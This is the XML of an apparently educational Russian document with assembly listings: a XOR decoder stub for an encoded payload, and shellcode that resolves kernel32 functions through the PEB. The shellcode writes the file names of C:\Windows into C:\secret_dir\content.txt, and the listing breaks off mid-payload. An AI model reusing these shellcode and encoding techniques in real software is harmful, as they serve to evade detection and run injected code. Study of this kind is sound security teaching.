      </w:r>
    </w:p>
    <w:p w14:paraId="69FF0D2D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C398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Листинг кода дешифратора </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728A2B36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56051C3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BITS 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FD905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7EA8FC6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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2EC2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loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E1B0B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section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2CD15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57EA3DC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start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C5410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push esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2BF1F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push eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED815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push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9D36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C6AA2E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;get in ebx the addr where encoded data ends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E1A7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mov ebx, esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BFCA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sub ebx, 0xfffffd35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6014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A03F10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; 0xfffffd35 = -(30+685)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783F6FB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; 30 - size of decoder, 685 - size of encoded data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD43C2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EAE45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;get addr of encoded data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6670465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mov esi, esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F50B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sub esi, 0xfffffff4 ; get addr of decoder = esp + 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B3F74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sub esi, 0xffffffe2 ; 0xffffffe2 = -30, 30 - size of decoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C035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5F009F2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loop: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264DC02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xor byte [esi], 0x03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BAC7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inc esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B7F6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cmp esi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B025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jnz loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BB8CB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119213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pop ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240C2C3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pop eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119FBB7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  pop esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC68A01">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="151BEC9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5021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Листинг кода, выполняющего запись имен файлов и папок из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C:\Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4367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3CADC23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BITS 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0FA16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EA6544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; Объявляем все метки как глобальные, чтобы linker их видел</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525EA6D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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62221C7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find_win_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E30C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loop_find_first_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE3602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found_find_first_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8ABA5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loop_find_next_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5473130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found_find_next_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4430D6A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loop_find_create_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F50B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found_create_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559D230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loop_find_write_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB8BA3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found_write_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4695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loop_find_close_handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448254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found_close_handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368EDEE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execute_main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11B6E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process_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B617F9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close_and_exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADA8E9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GLOBAL exit_loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35F45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25DA02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section .text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5F859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75D8EB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start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0EBE1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2ADA2FA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find_win_exec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7428C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Allocate stack frame for variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE0293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ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D939F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ebp, esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D000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sub esp, 0x100        ; Увеличим стек для большего буфера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361A691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6CA143F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Save strings on the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC765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44E4C04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FindFirstFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA78BA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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C234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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F755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word 0x4165</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F4337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0x6c694674</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55633C4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0x73726946</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C62EE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0x646e6946</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1DF1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[ebp-0x04], esp ; var4 = "FindFirstFileA\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F1C9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BA2CD5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FindNextFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E16BD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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6234967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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C65D9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0x41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12280A4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0x656c6946</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E7EF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0x7478654e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9FA35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0x646e6946</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4ABA4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[ebp-0x08], esp ; var8 = "FindNextFileA\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0CA4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69EAC2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CreateFileA (для создания/открытия файла)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBF681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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63513B9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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2D0A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0x41656c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07120EC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0x69466574</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B5370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0x61657243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156CC1D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[ebp-0x0c], esp ; var_c = "CreateFileA\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784FE1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7216C16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WriteFile (для записи в файл)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F77B81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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5755AA2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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233BCEF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0x65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA0DD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0x6c694665</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75CAC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0x74697257</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0DBD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[ebp-0x10], esp ; var10 = "WriteFile\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428EFEC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567998E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CloseHandle (для закрытия файла)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A673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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295F736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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C8F2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0x65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A44E3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0x6c694665</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35010ED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0x736f6c43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A011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[ebp-0x14], esp ; var14 = "CloseHandle\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B09A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CAF15B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Путь для поиска: C:\Windows\*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19AC4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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373C33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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E045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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628A3E1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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE8CA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; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3481407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0x2a5c7377       ; "dows"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57E42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0x6f646e69       ; "\Win"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655045D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0x575c3a43           ; "C:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE220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[ebp-0x18], esp   ; var18 = "C:\Windows\*\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566121A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F4B0FF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Путь к выходному файлу: C:\secret_dir\content.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A620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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6F1A2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             ; \x00 (терминатор)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA6945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             ; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A9AA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             ; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDD8D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ebx              ; \x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E54044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0x74       ; ".txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23A92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0x78742e74       ; "tent"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66A6D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0x6e65746e         ; "con" (3 байта)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726EF83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0x6f635c72       ; "_dir"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35096E8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0x69645f74       ; "cret"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B018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0x65726365       ; ":\se"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AF054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0x735c3a43            ; "C" (1 байт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F69A1C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[ebp-0x1c], esp   ; var1c = "C:\secret_dir\content.txt\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452987F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6B81BF8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kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1352A0E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eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98434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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59820E6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cl, 0x30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330ED95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ebx, fs:[ecx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAB674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694603F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ebx, [ebx + 0x0c]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E7EAF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ebx, [ebx + 0x14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680405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57DCCB9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ebx, [ebx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF957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ebx, [ebx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7EF02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kernel32.dll base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7272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ebx, [ebx + 0x10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B314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5702FA0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[ebp-0x20], ebx ; save base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145674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572540B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PE signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB154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[ebx + 0x3c] ; RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756BCFD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edx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281686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235A675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Export Table + 0x78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFAE30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[edx + 0x78] ; RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1362752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edx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE746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6A3C09C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number of exported functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3408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ecx, [edx + 0x14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A6D4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[ebp-0x24], ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875DD0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79144B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address table rva</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B6B6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esi, [edx + 0x1c]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F10CB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address table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE419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esi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB0585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Save on the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177057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[ebp-0x28], esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401D22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74CC01D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name table rva</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA1A3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esi, [edx + 0x20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E1D8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name table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB527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esi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2775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Save on the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A14E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[ebp-0x2c], esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD415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AB46D2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ordinary table rva</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7202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esi, [edx + 0x24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8C16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ordinary table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0BA6B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esi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D16CA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Save on the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A95F71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[ebp-0x30], esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450ED23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1ADB57F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eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1918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ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE18E6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42F2D9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; Поиск FindFirstFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A992C1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loop_find_first_file_a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A694AC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[ebp-0x2c]    ; name table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F9C3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esi, [ebp-0x04]    ; var4 = "FindFirstFileA\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42999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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034312F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9EAF22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cld </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C592D5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[edi+eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52411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edi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670BED8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6C49EC2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cx, 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C734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repe cmpsb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4586D04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AC1E69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jz found_find_first_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E975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5DE4D9D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inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2204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cmp eax, edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0642080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jb loop_find_first_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65163EF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7C8384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found_find_first_file_a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6174B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ordinal number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248789B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ecx, [ebp-0x30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC82A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[ebp-0x28] ; addr_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6651704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36F73AD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ax, [ecx + eax*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9BC2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[edx + eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D101E8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eax, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202D81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2ECF4F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[ebp-0x34], eax ; Save FindFirstFileA address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1491396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BDB056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eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027A3DE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[ebp-0x24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AC5DE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0D7E670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; Поиск FindNextFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40559C3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loop_find_next_file_a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07215E5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[ebp-0x2c] ; name table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D907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esi, [ebp-0x08] ; FindNextFileA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC54B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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A644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8621F4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cld </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A317B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[edi+eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE7E9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edi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25491FE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E15887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cx, 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C47B2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repe cmpsb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA4B22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5018C87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jz found_find_next_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7363F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7EDB8C0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inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298D48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cmp eax, edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672D2D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jb loop_find_next_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED02A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ECB773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found_find_next_file_a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E4E8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ordinal number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1AA3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ecx, [ebp-0x30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B9273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[ebp-0x28] ; addr_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944696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52226A3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ax, [ecx + eax*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA58DC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[edx + eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C15C0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eax, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B25D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7417157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[ebp-0x38], eax ; Save FindNextFileA address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7E71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242E5B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eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E9F44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[ebp-0x24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA7904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F4681B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; Поиск CreateFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E759E4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loop_find_create_file_a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1806E8A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[ebp-0x2c] ; name table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471AF87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esi, [ebp-0x0c] ; CreateFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE26A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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA858D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D71811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cld </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B26E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[edi+eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBEFA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edi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844A63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5850EF5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cx, 11          ; Длина "CreateFileA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238F8A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repe cmpsb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3222450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260E3A0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jz found_create_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7063F3A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232BAF5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inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690E615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cmp eax, edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0990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jb loop_find_create_file_a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D58B0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7166574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found_create_file_a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF3C4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ordinal number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6AA8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ecx, [ebp-0x30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832768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[ebp-0x28] ; addr_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1E97B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1CD6C89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ax, [ecx + eax*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57650E9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[edx + eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF134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eax, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F383EA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15A78B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[ebp-0x3c], eax ; Save CreateFileA address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7372908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7A384EE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eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C7AE6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[ebp-0x24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E45CC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83B556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; Поиск WriteFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC463E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loop_find_write_file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DBD5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[ebp-0x2c] ; name table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740901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esi, [ebp-0x10] ; WriteFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1000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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D795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474A19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cld </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1DC6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[edi+eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C29ED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edi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443395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B3B4A2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cx, 9           ; Длина "WriteFile"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0DA1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repe cmpsb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2288F9D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C8B239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jz found_write_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1888199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50E214C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inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E620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cmp eax, edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D24A5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jb loop_find_write_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085254D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5DC6ECB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found_write_file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91142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ordinal number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACCD05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ecx, [ebp-0x30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFC6CA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[ebp-0x28] ; addr_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008F71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4F9A791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ax, [ecx + eax*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE67D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[edx + eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719AA8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eax, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEC8A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253636A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[ebp-0x40], eax ; Save WriteFile address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE119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40F765A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eax, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD666E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[ebp-0x24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B30CF1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4A2102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; Поиск CloseHandle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C1DD2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loop_find_close_handle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409B3D2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[ebp-0x2c] ; name table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0391CEC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esi, [ebp-0x14] ; CloseHandle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA4096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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6A76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788CFA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cld </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3E4C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[edi+eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486FD74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edi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F018C2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D760FC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cx, 11          ; Длина "CloseHandle"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2101FA1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repe cmpsb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198CAE4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B287F1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jz found_close_handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E212FE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40AC97C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inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32525DA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cmp eax, edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D81D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jb loop_find_close_handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C729AE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267A9FE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found_close_handle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC332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Get ordinal number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652799F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ecx, [ebp-0x30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2828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edx, [ebp-0x28] ; addr_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B4A68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4ADC921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ax, [ecx + eax*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204F10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[edx + eax*4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0248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eax, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076FB2C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235E870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[ebp-0x44], eax ; Save CloseHandle address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A561BB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2D68096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F80B62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; --------- MAIN PAYLOAD ---------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2450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execute_main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB7D95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70EB207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Сначала создадим/откроем выходной файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C5E8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CreateFileA parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6001868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lpFileName = [ebp-0x1c] (путь к content.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5ED77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dwDesiredAccess = 0x40000000 (GENERIC_WRITE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0370352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dwShareMode = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6592B25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lpSecurityAttributes = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D4FB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dwCreationDisposition = 2 (CREATE_ALWAYS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50F95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dwFlagsAndAttributes = 0x80 (FILE_ATTRIBUTE_NORMAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765FE1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hTemplateFile = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11406F4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69D0746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                ; hTemplateFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3846E9A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0x80             ; FILE_ATTRIBUTE_NORMAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E01C2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2                ; CREATE_ALWAYS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9E9E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                ; lpSecurityAttributes = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECDB70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                ; dwShareMode = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB13BD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0x40000000       ; GENERIC_WRITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED8A6C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[ebp-0x1c]   ; lpFileName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F76D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eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651779E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81B345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[ebp-0x3c]   ; CreateFileA address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E292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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D07EE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97E420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cmp eax, -1           ; Check if INVALID_HANDLE_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789ABA8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jz exit_loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716BE68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58D089B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[ebp-0x48], eax   ; Save file handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB9717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27DB032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Начинаем поиск файлов в C:\Windows</w:t>
      </w:r>
    </w:p>
